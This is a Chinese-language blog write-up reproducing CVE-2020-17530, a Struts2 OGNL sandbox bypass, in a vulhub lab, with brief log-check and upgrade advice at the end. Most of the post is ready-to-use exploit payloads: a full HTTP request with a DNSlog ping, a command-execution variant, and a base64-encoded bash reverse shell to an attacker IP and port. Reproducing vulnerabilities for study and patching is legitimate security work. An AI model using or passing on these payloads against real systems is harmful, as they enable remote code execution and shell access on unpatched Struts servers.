大柚子

这世界不过如此

概述

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

CVE-2020-17530是对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。

在特定的环境下,远程攻击者通过构造恶意的OGNL表达式,可造成任意代码执行。

影响版本

Struts 2.0.0 – Struts 2.5.25

漏洞复现

使用vulhub里的漏洞环境

1、使用dnslog探测漏洞是否存在


POST /index.action HTTP/1.1
Host: 192.168.52.131:8080
Content-Length: 851
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.52.131:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfLALYDUSEsCqcvp9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.52.131:8080/index.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryfLALYDUSEsCqcvp9
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ping    vquj2m.dnslog.cn")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryfLALYDUSEsCqcvp9--

执行部分为:


%{(#instancemanager=#application&#91;"org.apache.tomcat.InstanceManager"]).(#stack=#attr&#91;"com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(<strong>#arglist.add("ping    vquj2m.dnslog.cn")</strong>).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}

2、执行命令


%{(#instancemanager=#application&#91;"org.apache.tomcat.InstanceManager"]).(#stack=#attr&#91;"com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}

3、反弹shell

注:反弹shell涉及到管道符问题,需要要将命令进行base64编码


%{(#instancemanager=#application&#91;"org.apache.tomcat.InstanceManager"]).(#stack=#attr&#91;"com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjEzMy8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}

应急排查

针对vulhub的docker环境场景

1、排查docker log日志

只有启动信息,无访问信息

2、排查struts2框架日志

一般struts2会配合log4j进行日志处理,但此环境未配置,故无日志排查

3、排查web访问日志

一般针对web类入侵,查看网站访问日志和错误日志是最高效的方式,但目前不适用此环境。

漏洞修复

避免对不受信任的用户输入使用强制OGNL评估,或/和升级到2.5.26版,可修复该漏洞。建议受影响的用户将Apache Struts框架升级至最新版本

参考链接

https://cloud.tencent.com/developer/article/1774734

Print Friendly, PDF & Email

发表回复

您的电子邮箱地址不会被公开。